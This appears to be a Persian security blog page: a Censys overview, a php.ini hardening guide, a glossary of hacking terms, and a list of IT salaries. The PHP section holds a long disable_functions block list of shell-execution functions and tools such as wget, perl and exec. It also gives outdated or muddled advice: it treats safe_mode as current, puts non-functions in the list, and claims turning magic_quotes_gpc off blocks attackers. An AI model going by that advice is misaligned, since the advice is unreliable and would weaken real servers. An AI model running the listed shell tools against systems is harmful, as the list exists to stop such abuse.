Censys اطلاعات اینترنتی را در مورد هر میزبان آنلاین جمع آوری می کند و اطلاعات را با اطلاعات امنیتی که شما نیاز دارید غنی می کند و سطح بینش لازم برای ایمن سازی شرکت را به شما می دهد. با این اطلاعات، شما همه چیزهایی را که نیاز دارید به دست خواهید آورد مانند تجزیه و تحلیل زیرساخت ها، سرمایه گذاری غیرمستقیم، جلوگیری از فیشینگ و جعل هویت نام تجاری، ردیابی دشمنان شناخته شده و جلوگیری از تهدیدات.

شما میتوانید خروجی داده Censys برای سازمان خود را به صورت API، SQL یا JSON ذخیره کنید.

چشم انداز جهانی اینترنت

Censys داده ها را از منابع مختلفی جمع آوری می کند از جمله:

  • Internet-wide network scanning(اسکن شبکه در سراسر جهان)
  • Certificate Transparency logs(گزارش های شفافیت گواهی)
  • Routing registries(مسیر یابی رجیستری)
  • DNS lookups(جستجوهای DNS)
  • Geolocation data(داده های مربوط به موقعیت جغرافیایی)

Censys همچنین به شما کمک می کند تا از شرکت خود در برابر حملات فیشینگ با یافتن وب سایت های غیر مجاز که با نام تجاری خود جعلی هستند محافظت کنید. مهاجمان متقلب می توانند هر دستگاه یا میزبان سازمان شما را آنلاین پیدا کنند. به منظور محافظت در برابر این تهدیدات، شما باید در مورد کسب و کارتان به همان اندازه بینش عملی و دید بیشتری داشته باشید.

میتوان این وب سایت را به همراه وب سایت shodanیک مرجع عالی برای افزایش امنیت سازمان ها معرفی کرد.

افزایش امنیــــــت ســــــــــــــــــــرورهای دارایPHP

امنیت PHP بدلیل استفاده بسیار گسترده در سرورهای اینترنتی مقوله چالش بر انگیز و مهمی است که می‌توان آن را با تنظیمات ساده تا حد زیادی تامین کرد.

پیشتر در مطلب آشنایی با اصطلاحات هک و امنیت با ضروری ترین اصطلاحات و حملات هکری آشنا شدیم. برای استفاده حداکثری از این آموزش حتما این مطلب را بخواهید.

قطعا مهم ترین کاری که می‌توان برای افزایش بهره وری و امنیت سرورهای حاوی PHP انجام داد بروز رسانی مستمر به نسخه‌های پایدار است.

بروز رسانی php

مدیران سرور بهانه‌های بسیاری برای بروز رسانی نکردن سرورهای خود می‌آورند که غالبا غیر موجه هستند.

 بالابردن امنیت PHP با php.ini

php.ini

تمامی پیکربندی های PHP را می‌توان در این فایل انجام داد. برخی از مهم ترین پیکربندی‌های این فایل عبارتند از:

  • موقعیت ذخیره سازی Cache ها
  • ذخیره سازی Log ها
  • محدودیت‌های دسترسی
  • ذخیره موقعیت زمانی در php
  • ذخیره و تنظیم موارد مرتبط با آپلود اطلاعات
  • فعال سازی تمام یا بخشی از کتابخانه‌های موجود در php و غیر فعال کردن بخشی از آن ها
  • و ...

در پایین به صورت خلاصه قصد داریم مهم ترین تنظیمات این فایل را به شما آموزش دهیم:

فعال سازی safe mode در php.ini برای افزایش حداکثری امنیت

قابلیت safe_mode قابلیتی بسیار مهم است که منجر به افزایش امنیت PHP می‌شود. این قابلیت وظیفه جلوگیری اجرای کدهای مخرب که به آن‌ها شل گفته می‌شود را دارد.

گاهی ممکن است هکرها بتوانند تا حدودی به سایت یا سرور شما نفوذ کنند که برای تکمیل فرایند نفوذ خود نیازمند افزایش دسترسی دارند که در این موارد معمولا از شل‌ها بهره می‌گیرند.

اگر از سرور اختصاصی استفاده می‌کنید حتما این قابلیت را فعال کنید ولی اگر سروری استفاده می‌کنید که در آن سایت‌های زیادی وجود دارد، این احتمال وجود دارد که سایت‌ها با مشکل مواجه شوند. بنابر این تنها برخی از قابلیت های safe_mode را غیر فعال می‌کنیم:

sql.safe_mode = On

البته برای تکمیل امنیت باید قابلیت magic_quotes_gpc را نیز غیر فعال کنیم تا نفوذگر نتواند از علامت‌های نقل قول برای فرایند نفوذ خود استفاده کند:

magic_quotes_gpc = Off

محدود سازی منابع و دسترسی‌ها در PHP

تنظیمات زیر را ببینید:

max_execution_time = 60

max_input_time = 60

memory_limit = 90M

post_max_size = 16K

در بالا همانطور که می‌بنید برای چهار فاکتور مهم محدودیت اعمال کردیم.

max_execution_time: حداکثر زمان اجرای فرمان‌ها است.

max_input_time: حداکثر زمان ارسال اطلاعات.

memory_limit: حداکثر میزان استفاده از رم.

post_max_size: حداکثر سایز داده با متد post.

بستن قابلیت Upload و ورژن PHP

با دستور زیر قابلیت Upload را می‌بندید تا متجاوزان نتوانند چیزی را Upload کنند:

file_uploads = Off

مهم ترین کاری که یک هکر می‌کند آپلود فایل‌های مخرب روی سرور شماست.

بستن قابلیت مشاهده ورژن PHP:

expose_php = Off

اهمیت بسیاری دارد که هکرها نفهمند چه نسخه‌ای از PHP روی سرور شما نصب است. گاهی هکر‌ها با اطلاع از نسخه php و جستجو در باگ‌های آن می‌توانند به سرور شما نفوذ کنند.

غیر فعال کردن فانکشن‌ها و کتابخانه‌های غیر ضروری برای امنیت بیشتر

 PHP توابع بسیاری دارد که برخی بسیار ضروری هستند ولی قسمتی از این توابع نیز کاربرد چندانی ندارند و باید آن‌ها را غیر فعال کرد، چون این توابع ممکن است باعث تسهیل فرایند نفوذ شوند.

 در زیر لیستی از این توابع را غیر فعال می‌کنیم:

disable_functions = symlink,curl_setopt,curl_exec,curl_init,fpassthru,crack_check,crack_closedict,crack_getlastmessage,crack_opendict,psockopen,php_ini_scanned_files,shell-exec,system,dl,ctrl_dir,phpini,tmp,safe_mode,systemroot,server_software,get_current_user,HTTP_HOST,ini_restore,popen,pclose,exec,shell_exec,suExec,passthru,proc_open,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,escapeshellcmd,escapeshellarg,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_setegid,posix_seteuid,posix_setgid,posix_times,posix_ttyname,posix_uname,posix_access,posix_get_last_error,posix_mknod,posix_strerror,posix_initgroups,posix_setsid,posix_setuid,perl,rsync,wget,./,python,touch,whoami,cat,perm,find,phpinfo,php_uname

 برخی از توابع فوق باعث اجرای شل‌های خطرناک و یا باعث ایجاد symlink در سرور می‌شوند.

اصطلاحات مهم هـــــــــــک وامنیــــــــــــــت

هکر کیست؟

هکر چیست؟

هک به روشی هوشمندانه برای حل مشکلی ویژه گفته می‌شود، و هکر به کسی گفته می‌شود که از این روش‌های هوشمندانه استفاده می‌کند. ولی متاسفانه امروزه هکر به معنای شخصی است که به منظور اخاذی و یا خرابکاری در سیستم‌ها و سایت‌ها شروع به خراب کاری می‌کند.

هکر کلاه سیاه کلاه سفید و کلاه خاکستری

البته برخی هکرها را به چند دسته تقسیم کرده اند:

هکر کلاه سفید: به هکری گفته می‌شود که به منظور پیدا کردن مشکلات موجود در سرورها و نرم افزارها به آن‌ها نفوذ می‌کند و پس از گزارش مشکل به مسیولین در رفع عیب آن عیب سهیم است. هکرهای کلاه سفید برخی اوقات در مسابقاتی شرکت می‌کنند که شرکت‌های امنیتی برگذار می‌کنند.

مثلا شرکت گوگل و تلگرام برای گزارش باگ به کاربران هدایای نقدی می‌دهند. هکرهای کلاه سفید می‌توانند از این طریق جوایز ده‌ها هزار دلاری و یا حتی چند صد دلاری برنده شوند.

برخی مدیران سایت‌ها و سرور‌ها نیز به گروه‌های هک کلاه سفید مبالغی می‌دهند تا سعی کنند آن سیستم را هک کنند و عیب‌های موجود را گزارش دهند.

هکر کلاه سیاه: به هکری گفته می‌شود که به منظور اخاذی و یا تخریب وارد سیستم‌ها و سایت‌ها می‌شوند. هکر‌های کلاه سیاه در همه جای دنیا تحت تعقیب هستند و اعمال آن ها خلاف قانون تلقی می‌شوند.

هکر کلاه خاکستری: به هکری گفته می‌شود که گاهی اعمال هکر‌های کلاه سیاه و گاهی اعمال هکرهای کلاه سفید را انجام می‌دهد.

هکر کلاه صورتی: به افراد آماتوری گفته می‌شود که برای ارضای حس کنکجاوی خود دست به اعمالی می‌زنند که یا سایت‌ها را تخریب کنند و یا به اطلاعاتی دست پیدا کنند که حق دسترسی به آن‌ها را ندارند.

کرکر کیست؟

کرکر کیست؟

همانطور که در بالا گفته شد یک هکر می‌تواند یک شخص مفید و کارامد باشد، ولی یک کرکر یک شخص کاملا مضر است. کرکرها به سرور بانک‌ها نفوذ می‌کنند و آن‌ها را متوقف می‌کنند، سایت‌های مهم را با روش‌هایی پیچیده از کار می‌اندازند و یا حتی پسورد کاربران را به سرقت می‌برند و در بازار سیاه می‌فروشند.

واکر به چه کسی گفته می‌شود؟

واکر به نفوذگر کلاه سیاهی گفته می‌شود که به منظور سرقت اطلاعات وارد سیستم‌های دیگر می‌شود. مثلا یک واکر بر اساس سفارشی که می‌گیرد وارد سامانه ثبت احوال شده و اطلاعات محل سکونت یک شخص را در اختیار خلاف کاران می‌گذارد.

پریکر کیست؟

در دهه‌های پیش پریکر‌ها بیشترین جولان می‌دادند. پریکر‌ها به شبکه‌های تلفن نفوذ می‌کنند و مکالمه‌ها را استراق می‌کنند. این پریکرها ممکن است پروژه‌هایی را برای سازمان‌های مخفی و خلافکار اجرا کنند، بنابراین پریکر بودن یک جرم است و پریکرها در تمام نظام‌های حقوقی جهان محاکمه و مجازات می‌شوند.

البته برخی از پریکر‌ها نیز تنها برای خود کار می‌کنند و از دانش خود برای تماس مجانی استفاده می‌کنند.

مهندسی اجتماعی

آشنایی با مهندسی اجتماعی در هیتوس

خیلی از افراد فکر می‌کنند عملیات هک تنها با دانش فنی و تخصص انجام می‌پذیرد در صورتی که اصلا اینگونه نیست. بسیاری از پروژه‌های هک بزرگ با کمک مهندسی اجتماعی که کمک گرفتن از قربانی است انجام می‌پذیرد. سناریو زیر را با دقت بخوانید:

یک هکر می‌خواهد وارد یک شبکه کامپیوتری شود ولی نمی‌تواند ضعفی در ورود به شبکه پیدا کند. یک خانم را مامور می‌کند با یکی از کارمندان آن شبکه دوست شود و به او یک فلش با آهنگ‌های مورد علاقه بدهد. در ساعت کاری این خانم با کارمند شبکه تماس می‌گیرد و می‌گوید یکی از کلیپ‌های موجود در فلش با نامی معین را اجرا کند چون یک آهنگ نیست بلکه یک پیغام صوتی عاشقانه است.

کارمند شبکه با ذوق و شوق آن فلش را برای شنیدن آن فایل صوتی به کامپیوتر خود می‌زند و یک ویروس مخرب را ناخواسته وارد آن شبکه می‌کند و برای نفوذگر امکان نفوذی بی درد سر را محیا می‌کند.

به سناریو بالا مهندسی اجتماعی می‌گویند.

فیشینگ چیست؟

حملات فیشینگ

حملات فیشینگ را می‌توان از حملات مرتبط با حوزه مهندسی اجتماعی دانست. شخص نفوذگر با استفاده از فیشینگ شروع به سرقت اطلاعات از حجم عظیمی از کاربران می‌کند. یکی از حملات معروف فیشینگ ارسال ایمیل‌های جعلی از سمت بانک است. بدین نحو که یک نفوذگر ایمیل جعلی از سمت یک بانک را برای تعداد زیادی کاربر ایمیل می‌کند و در آن یک لینک قرار می‌دهد که به جای هدایت به صفحه اصلی بانک کاربر را به صفحه‌ای مشابه صفحه بانک هدایت می‌کند. کاربر پس از دیدن صفحه‌ای مشابه صفحه بانک و وارد کردن یوزرنیم و پسورد خود در دام هکر می‌افتد. در برخی حملات فیشینگ نام کاربری و رمز عبور هزاران کاربر بانک به سرقت می‌روند.

البته فیشینگ به سرقت اطلاعات از طریق مکالمات تلفنی یا پیام کوتاه نیز اطلاق می‌شود. به این معنا که گاهی نفوذگران با تماس تلفنی سعی در تخلیه اطلاعاتی کاربران دارند.

حملات SQL Injection:

آشنایی با حملات sql injection

پایگاه داده جزء حیاتی و لا ینفک هر سیستمی در شبکه و اینترنت است. تمامی سایت‌ها و سامانه‌ها از پایگاه داده استفاده می‌کنند.

بدلیل ماهیت پایگاه داده که عملیات فراخوانی و ذخیره اطلاعات را با هم انجام می‌دهند این سیستم مستعد حجم بزرگی از آسیب پذیری‌ها است و اولین هدف هر نفوذگری در واقع رخنه کردن به اطلاعات موجود در سیستم دیتابیس سایت یا سامانه تحت وب است.

عملیات SQL Injection به این نحو است که نفوذگر پس از یافتن آسیب پذیری SQL در سورس سایت شروع به تزریق کدهای مخرب به منظور واکشی اطلاعات از آن آسیب پذیری می‌کند.

در برخی پایگاه‌های داده بدلیل تنظیمات خاص نمی‌توان تغییراتی در جداول موجود در پایگاه داده ایجاد کرد ولی می‌توان حداقل اطلاعات موجود در پایگاه داده را خواند و از آن‌ها برای تکمیل عملیات نفوذ بهره برد.

مثلا اگر از یک سیستم بتوان نام کاربری مدیر سایت را استخراج کرد، حتی اگر نتوانیم Hash پسور را کرک کنیم می‌توانیم با کمک نام کاربری عملیات Brute Force را انجام دهیم.

روت کیت چیست؟

روت کیت چیست؟

هرچند که RootKit ها را از برخی نظر‌ها می‌توان مانند BackDoor‌ها و یا تروجان‌ها دانست ولی از تروجان‌ها و بک دورها بسیار خطرناک تر اند. روت کیت‌ها پس از نفوذ به سیستم علاوه بر وظایف تروجان‌ها و Backdoor‌ها خود را جایگزین بخش‌های مهمی از سیستم عامل حتی هسته آن می‌کنند و دسترسی‌های مهلک و بعضا غیر قابل شناسایی به نفوذگران می‌دهند.

اولین روت کیت‌ها در سال 1990 شناسایی شدند و از آن زمان تا کنون روت کیت‌های متنوعی برایسیستم‌های عامل لینوکسی و ویندوزی نوشته شده اند، هر چند تعداد RootKit‌هایی که برای سیستم عامل لینوکس نوشته شده است بیشتر از ویندوز است.

یکی از انواع RootKit‌های معروف در لینوکس خود را جایگزین برنامه /bin/login می کنند و یک پسورد ریشه به این برنامه می‌افزایند. اکثر روت کیت‌ها خود را جایگزین برنامه‌های زیر می‌کنند:

  • DU
  • Find
  • Ifconfig
  • Login
  • ls
  • Netstat
  • ps

البته خطرناک ترین نوع RootKit آن نوعی است که خود را جایگزین هسته سیستم عامل می‌کند، چون دیگر هسته سیستم عامل را بدست گرفته است و حتی روی عملکرد نرم افزارهای اسکن ویروس و روتکیت هم تاثیر می‌گذارد و به سادگی آن‌ها را غیر فعال و بی خاصیت می‌کند. با روت کیت‌های سطح هسته شخص نفوذگر می‌تواند تمام عملیات و فعالیت‌ها را به صورت کامل و بی درد سر ذخیره و شنود کند. از مهم ترین روت کیت‌های سطح هسته لینوکسی می‌توان به Knrak و Adore اشاره کرد که می‌توان آن‌ها را از اینترنت دانلود کرد.

آسیب پذیری Zero Day یا حمله روز صفر چیست

آسیب پذیری Zero day

آسیب پذیری Zero Day، آسیب پذیری‌ای است که تا مدت‌ها تنها تعداد کمی هکر از آن اطلاع دارند. این نوع آسیب پذیری‌ها تا زمانی که توسط متخصصین شناسایی و بر طرف نشوند Zero Day می‌مانند.

هکرها برای این آسیب پذیری‌ها اکسپولیت‌هایی می‌سازند که گاهی تا صدها هزار دلار بفروش می‌رسد.

امسال یعنی در سال 2016 یک آسیب پذیری Zero Day در ویندوز و در بخش win32k.sys به قیمت 100 هزار دلار بفروش رسیده است. این آسیب پذیری منجر به افزایش سطح دسترسی کاربر در تمام نسخه‌های ویندوز از نسخه 2000 تا ویندوز 10 می‌شود. با وجود اطلاع از وجود چنین مشکلی ولی هنوز مایکروسافت به علت آن پی نبرده است و تلاش‌ها برای یافتن این آسیب پذیری همچنان ادامه دارد.

از جمله آسیب پذیری‌های Zero Day که کشور عزیزمان را مورد حمله قرار داده اند می‌توان بهویروس Sutxnet که به نیروگاه‌های هسته ای آسیب وارد کرد و همچنین ویروس Flame که به پالایشگاه‌های نفت ایران نفوذ کرد اشاره کرد.

بدلیل سطح بالا بودن این نوع آسیب پذیری‌ها تقریبا هیچ نرم افزار و آنتی ویروسی نمی‌تواند آن‌ها را شناسایی کند و حتی سازندگان نرم افزار به سادگی قادر به حل کردن این دست آسیب پذیری‌ها نیستند.

البته پکیج‌های گران قیمت تست نفوذی وجود دارند که مجموعه‌ای از Zero Day‌های نرم افزارها را در خود دارند و توسط متخصصین امنیت مورد استفاده قرار می‌گیرند. یکی از این فریم‌ورک‌های تست نفوذ، canavas نام دارد.

اصطلاحات عمومی هک و امنیت

تارگت: به هدف در تست نفوذ سایت، سرور و یا هر سیستمی تارگت می‌شود. مثلا اگر قصد نفوذ به سایت abc.com را داشته باشید این سایت تارگت شما خواهد بود.

پینگ: Ping دستوری است که با آن می‌خواهیم ببینیم آی پی‌ای که داریم در سرور فعال است یا خیر؟ در ضمن با دستور Ping می‌توانیم زمان رسیدن بسته‌ها را نیز بدست بیاوریم. دستور Ping در ویندوز و لینوکس به صورت زیر استفاده می‌شود:

ping ip-address

پورت: پورت در شبکه و اینترنت به معنی درگاه‌های ارتباطی با دنیای بیرون هستند. با استفاده از پورت‌ها می‌توان بین یک سیستم و دنیای بیرون آن ارتباط برقرار کرد. در تست‌های نفوذ شخص نفوذگر سعی می‌کند روی سیستم تارگت پورت‌هایی را بیابد که امکان نفوذ به آن‌ها وجود دارد.

تلنت: Telnet یک پروتکل تحت شبکه برای سرویس گرفتن و سرویس دادن است. نفوذگران از تلنت برای بررسی باز بودن پورت‌های حیاتی استفاده می‌کنند.

باگ در سیستم‌های کامپیوتری

باگ: باگ به معنی نقص نرم افزاری است و می‌تواند منجر به خراب شدن، از کار افتادن یا نشت اطلاعات سیستم شود. نخستین بار لفظ باگ به حشره‌ای اطلاق شد که منجر به خراب شدن کامپیوترها شده بود ولی با پیشرفت دانش و مستحکم تر شدن و کوچکتر شدن دستگاه‌ها دیگر حشره‌ها نمی‌توانند به کامپیوترها آسیب جدی‌ای وارد کنند! امروزه باگ به اشکالات نرم افزاری گفته می‌شود که در تمام نرم افزارها وجود دارد. در دنیای کامپیوتر و شبکه نمی‌توان نرم افزار یا سیستم عاملی را بی عیب و نقص و یا به اصطلاح بدون باگ یافت، مزیت سیستم عامل قدرتمندی مانند لینوکس این است که باگ هایش به سرعت کشف و بر طرف می‌شوند. ولی یافتن باگ در سیستم عامل‌ها و نرم افزار‌های معروف و حرفه‌ای کاری بسیار پیچیده، زمان بر و برای اکثر متخصصین نا ممکن است.

دیباگ: به عمل رفع عیب باگ‌ها دیباگ کردن می‌گویند. عمل دیباگ کردن برخی از اوقات عملی سخت و برخی از اوقات شاید حتی ناممکن باشد. در برخی از سیستم‌های عامل بدلیل نا ممکن بودن دیباگ کردن مجبورند ساختار سیستم عامل را تغییر دهند.

پچ: وصله‌های نرم افزاری هستند که برای بهبود عملکرد سیستم به سیستم اضافه می‌شوند.

صفحه دیفیس و اصطلاحات هک و امنیت

دیفیس: وقتی یک هکر کلاه سفید، خاکستری، سیاه و یا کلاه صورتی به یک سیستم نفوذ می‌کند چگونه قدرت خود را به رخ دیگران می‌کشد؟ با دیفیس کردن. در واقع دیفیس کردن به عملی گفته می‌شود که شخص نفوذگر با آن عمل ظاهر سایت را به چیز دیگری تغییر می‌دهد و به این روش اثبات می‌کند که توانسته است به آن سیستم نفوذ کند.

مس دیفیس: به عملکردی گفته می‌شود که طی آن کل صفحات سایت‌های یک سرور تغییر پیدا می‌کنند. این عمل یا با استفاده از شل‌ها انجام می‌پذیرد یا عموما نیاز به اسکریپت‌هایی دارد که شخص نفوذگر باید بنویسد.

اکسپلویت ها: در اکثر موارد برای نفوذ به یک سیستم نیاز است که یک سری اعمال به صورت مشخص تکرار شوند که این اعمال مشخص و تکراری اکسپلویت نامیده می‌شوند. اکسپلویت‌ها در واقع کدهایی هستند که نفوذگران از آن‌ها برای انجام عملیات نفوذ استفاده می‌کنند. به عنوان مثال ممکن است در سیستم مدیریت محتوای جوملا یک باگی وجود داشته باشد که منجر به درز پسورد مدیر سیستم می‌شود. متخصصین نفوذ یک اکسپولیت برای این باگ می‌نویسند تا خودشان یا دیگر نفوذگران بدون نیاز به انجام عملیات روتین به سادگی عملیات نفوذ را انجام دهند.

بایپس: طبیعتا راهکار‌های نرم افزاری و سخت افزاری بسیاری برای جلوگیری از هک شدن توسط مسیولین سرورها و نرم افزارها اتخاذ می‌شود. عملیاتی را که طی آن شخص نفوذگر و یا شخص تست کننده نرم افزار در آن‌ها سعی می‌کند دیوارهای حفاظتی سیستم را رد کند عملیات بایپس می‌نامند.

فیک پیج چیست؟

فیک پیج ها: یکی از راه‌های سرقت یوزرنیم‌ها و پسورد‌ها استفاده از فیک پیج‌ها توسط نفوذگران است. فیک پیج یا صفحه تقلبی، می‌تواند صفحه ورود به ایمیل باشد. مثلا فرض کنید یک نفوذگر یک صفحه‌ای دقیقا مانند صفحه ورود به یاهو بسازد و آن صفحه را به شخصی دیگر بدهد. قربانی در مواجهه با این صفحه تصور می‌کند وارد صفحه ایمیل خود شده است، بنابراین یوزرنیم و پسورد خود را وارد کرده و به دام هکر می‌افتد.

دورک ها: دورک‌ها به کدهایی گفته می‌شوند که در جستجوگرهای وب (عموما گوگل) برای یافتن سایت‌های مشکل دار مورد استفاده قرار می‌گیرند. مثلا فرض کنید بودن عبارت MYSQL ERROR در یک سایت به معنای وجود باگ در آن سایت است. با عبارت site:sitename.com "MYSQL ERROR" می توان سایت sitename.com را از نظر داشتن باگ جستجو کرد.

هش ها: سابقا یک مطلب در هیتوس با این لینک در مورد رمزنگاری و هش‌ها منتشر شده بود. بدلیل پر خطر بودن پایگاه‌های داده متخصصین، پسوردها را به صورت معمولی در پایگاه داده ذخیره نمی‌کنند و برای ذخیره کردن، آن‌ها را تبدیل به هش می‌کنند تا به سادگی نتوان آن‌ها را خواند. البته راه حل‌هایی وجود دارد که گاهی نفوذگران برای تفسیر هش‌ها استفاده می‌کنند که برخی اوقات مثمر ثمر هستند.

تروجان: ایده تروجان به یک افسانه یونانی باز می‌گردد. یونانیان که پس از مدت‌ها جنگ نتوانستند قلعه تروا را فتح کنند به نشانه صلح یک اسب بزرگ را به عنوان هدیه به درون قلعه می‌فرستند. سربازان قلعه تروا شادمان از پایان جنگ تا پاسی از شب به خوردن شراب و رقص پرداخته بودند ولی غافل از این که درون اسب بزرگ پر بود از سربازان تا دندان مسلح. سربازان درون اسب بزرگ چوبی پس از آرام شدن قلعه و اطمینان از خواب افراد درون قلعه از اسب چوبی خود بیرون آمدند و دروازه را برای سربازان یونانی باز کردند. این ایده دقیقا در دنیای هک نیز استفاده می‌شود، یعنی ارسال فایلی مخرب به درون سیستم در قالبی آرام و بی آزار، ولی همین فایل بی آزاد موجب نابودی سیستم خواهد شد.

کرک: عملیات شکستن سدهای امنیتی و انجام عملیات نفوذ را کرک کردن می‌گویند. مثلا ممکن است یک نرم افزار برای استفاده نیازمند لایسنس خاصی باشد. نفوذگران این نرم افزار را به اصطلاح کرک می‌کنند تا بدون نیاز به لایسنس بتوان از آن‌ها استفاده کرد.

کیلاگر: همانطور که از نام کیلاگر مشخص است کیلاگر به برنامه مخربی گفته می‌شود که وظیفه ذخیره کلیدهای فشرده شده روی کیبورد و ارسال آن‌ها به شخص نفوذگر بر عهده دارد. شما تقریبا تمام اطلاعات مهم را با استفاده از کیبورد به کامپیوتر خود می‌دهید، یوزرنیم ها، پسوردها و آدرس ها. شخص نفوذگر به منظور سرقت اطلاعات شما یک کیلاگر را بدرون سیستم شما می‌فرستد تا اطلاعات شما را برباید.

رات: رات‌ها از کیلاگر‌ها وسیع تر هستند و حتی امکان ارسال تصویر از مانیتور و یا حتی وصل کردن مهاجم به کامپیوتر قربانی را بر عهده دارند. ممکن است یک نفوذگر ابتدا با کیلاگر دسترسی‌هایی بر سیستم قربانی بیابد و سپس یک رات را روی آن سیستم نصب کند.

بایند کردن: ترکیب فایل‌های مخرب کیلاگر و رات‌ها با فایل‌های دیگر برای مخفی شدن از آنتی ویروس‌ها و فعالیت بدون درد سر در سیستم قربانی را بایندرها بر عهده می‌گیرند.

shell و شل

شل: بسیاری از باگ‌ها و مشکلات موجود در نرم افزارها و سیستم‌ها منجر به نفوذی محدود به سیستم می‌شوند. برای افزایش دسترسی پس از نفوذ از شل‌ها استفاده می‌شود. شل‌ها نرم افزارهای متنوعی هستند و برای افزایش دسترسی معمولا مجبوریم چند شل را استفاده کنیم.

باگ‌های پابلیک: همانطور که در بالا گفتیم هر سیستم عامل و یا نرم افزاری باگ‌هایی را در خود دارد. این باگ‌ها ممکن است در دسترس همه نفوذگران باشند، و بدلیل آپدیت نشدن سیستم قابل استفاده باشند.

باگ‌های پریویت: بر عکس باگ‌های پابلیک این باگ‌ها در اختیار برخی از افراد قرار دارند و تا علنی نشدن مورد استفاده قرار می‌گیرند. باگ‌ها بعد از علنی و پابلیک شدن به سرعت توسط توسعه دهندگان سیستم بر طرف می‌شوند.

بک دور

بک کانکت و بک دورها: فرض کنید یک نفوذگر پس از مدت‌ها تلاش بتواند پسورد نفوذ به سیستم را بیابد و به آن نفوذ کند. عملیات نفوذ و دستیابی به اطلاعات ممکن است یک ماه طول بکشد، ولی مدیر سیستم پس از چند روز پسورد سیستم را عوض می‌کند و دسترسی نفوذگر کاملا قطع می‌شود. برای جلوگیری از این مشکلات نفوذگران پس از نفوذ به سیستم در اسرع وقت یک بک کانکت یا بک دور (در پشتی) روی سیستم قربانی نصب می‌کنند تا در صورت بسته شدن دسترسی‌ها باز بتوانند به آن سیستم نفوذ کنند.

سایت‌های ثبت هک: نفوذگران ممکن است به مدت چند دقیقه بتوانند یک سیستم را هک کنند و صفحه اصلی آن را دیفیس کنند، بعدها برای اثبات اینکه سابقا توانسته اند آن سایت را هک کنند نیاز به یک دلیل معتبر دارند. برخی از سایت‌ها این وظیفه را برعهده دارند و پس از هک شدن یک سایت می‌توانند وضعیت فعلی آن را ذخیره کنند. یکی از این سایت‌ها سایت zone-h.org است.

نگاه اجمالی به درآمد سالانه مهندسین فنآوری در جهان

اگر دوست دارید روزی در یکی از شرکت‌های بزرگ حوزه IT کار کنید و یکی از پست‌های تخصصی آن‌ها بر عهده شما باشد، باید بدانید که در چه زمینه و حوزه‌ای فعالیت کنید. در این بین درآمد یکی از مهم‌ترین فاکتورها در تصمیم‌گیری شاخه‌ای است که می‌خواهید دنبال کنید. در این مطلب 10 شغل پردرآمد تخصصی حوزه IT مورد بررسی قرار گرفته تا دید بهتری به علاقمندان و کارجویان ارائه کند.

برای این‌که بتوانید در یکی از بهترین شرکت‌های فناوری دنیا مشغول به‌کار شوید لازم نیست که حتما مهارت‌های فنی داشته باشید. اما برای آن‌هایی که این‌گونه مهارت‌ها را در خود پرورش می‌دهند پاداش بزرگی در انتظارشان است.

در آخرین گزارش منتشر شده از سوی Glassdoor، پردرآمدترین شغل‌های فنی در صنعت IT بر اساس متوسط حقوق مورد تجزیه و تحلیل قرار گرفته است. اگر تمایل دارید تا در یکی از شرکت‌های معروف سیلیکون ولی یا فراتر از آن شغلی برای خودتان دست و پا کنید، با مطالعه این گزارش به‌خوبی متوجه می‌شوید که باید روی کدام بخش‌ها تمرکز کنید.

در این قسمت به‌بررسی 10 شغل پردرآمد می‌پردازیم:

1- مهندس امنیت اطلاعات: درآمد سالانه 131 هزار و 300 دلار

مهندس امنیت اطلاعات روی محافظت از داده‌های شرکت مربوطه در برابر حملات هکرها و سایر گروهای خراب‌کار تمرکز دارد. این کار می‌تواند از طریق تقویت رمزگذاری یا در کل از بین بردن هرگونه شکاف‌ها و رخنه‌های امنیتی در زیرساخت شرکت صورت گیرد.

2- مهندس DevOps: حقوق سالانه 137 هزار و 400 دلار

یک مهندس DevOps (عملیات و توسعه) در زمینه آماده کردن و تحویل سریع مقدار زیادی کد تخصص دارد.

3- معمار شرکت‌های بزرگ: حقوق سالانه 144 هزار و 400 دلار

معماری که در شرکت‌های بزرگ مشغول به‌کار است در زمینه توسعه طرح‌ها و جریان‌های کاری برای تهیه، بکارگیری و نگهداری از سرورها، نرم‌افزار و سایر بخش‌های IT فعالیت می‌کند. به‌عبارت دیگر، این معمار نقش مهمی در تعیین و اجرای استراتژی IT دارد.

4- مدیر برنامه فنی: حقوق سالانه 145 هزار دلار

مدیر برنامه فنی کسی است که تمام پروژه‌های در حال اجرا یا در دست اجرای شرکت، تست کدها، انتظارات و پیش‌بینی‌هایی که از ارائه محصول وجود دارد و هم‌چنین چشم‌انداز روال توسعه مجموعه را مدیریت می‌کند.

5- معمار نرم‌افزار: حقوق سالانه 145 هزار و 400 دلار

یک معمار نرم‌افزار مسئول تنظیم و برپا کردن طرح و استراتژی کلی برای تهیه و ساخت نرم‌افزار است. برای این کار باید فنی باشید، اما وظیفه اصلی شما تنظیم سرعت و اهداف برای سایر تیم‌های توسعه است.

6- معمار اپلیکیشن: حقوق سالانه 149 هزار دلار

فردی که قصد دارد تا معمار اپلیکیشن باشد باید استراتژی موردنظر در داخل شرکت را انتخاب کند: چه زمانی از ابزارهای موجود استفاده کند، چه زمانی ابزارهای جدید بسازد، و دائما در حال توسعه نمونه‌های موجود برای توسعه‌های بیشتر باشد.

7- معمار زیرساخت: حقوق سالانه 153 هزار دلار

معمار زیرساخت مسئول فراهم کردن زیرساخت سیستم‌های IT در داخل مجموعه است. این زیرساخت‌ها شامل سرورها، مراکز داده یا پلتفرم‌های محاسبات ابری می‌شود.

8- مدیر توسعه نرم‌افزار: حقوق سالانه 153 هزار و 300 دلار

مدیر توسعه نرم‌افزار هدایت و رهبری تیم توسعه و تست سیستم‌های خاص یا اپلیکیشن‌ها در داخل شرکت را به‌عهده دارد.

9- معمار انبار داده: حقوق سالانه 154 هزار و 800 دلار

وظیفه یک معمار انبار داده به‌طور کلی نظارت بر گنجینه‌های عظیم داده‌های شرکت و کمک به آماده‌سازی آن‌ها برای تجزیه و تحلیل است.

10_ مدیر مهندسی نرم‌افزار: حقوق سالانه 163 هزار و 500 دلار

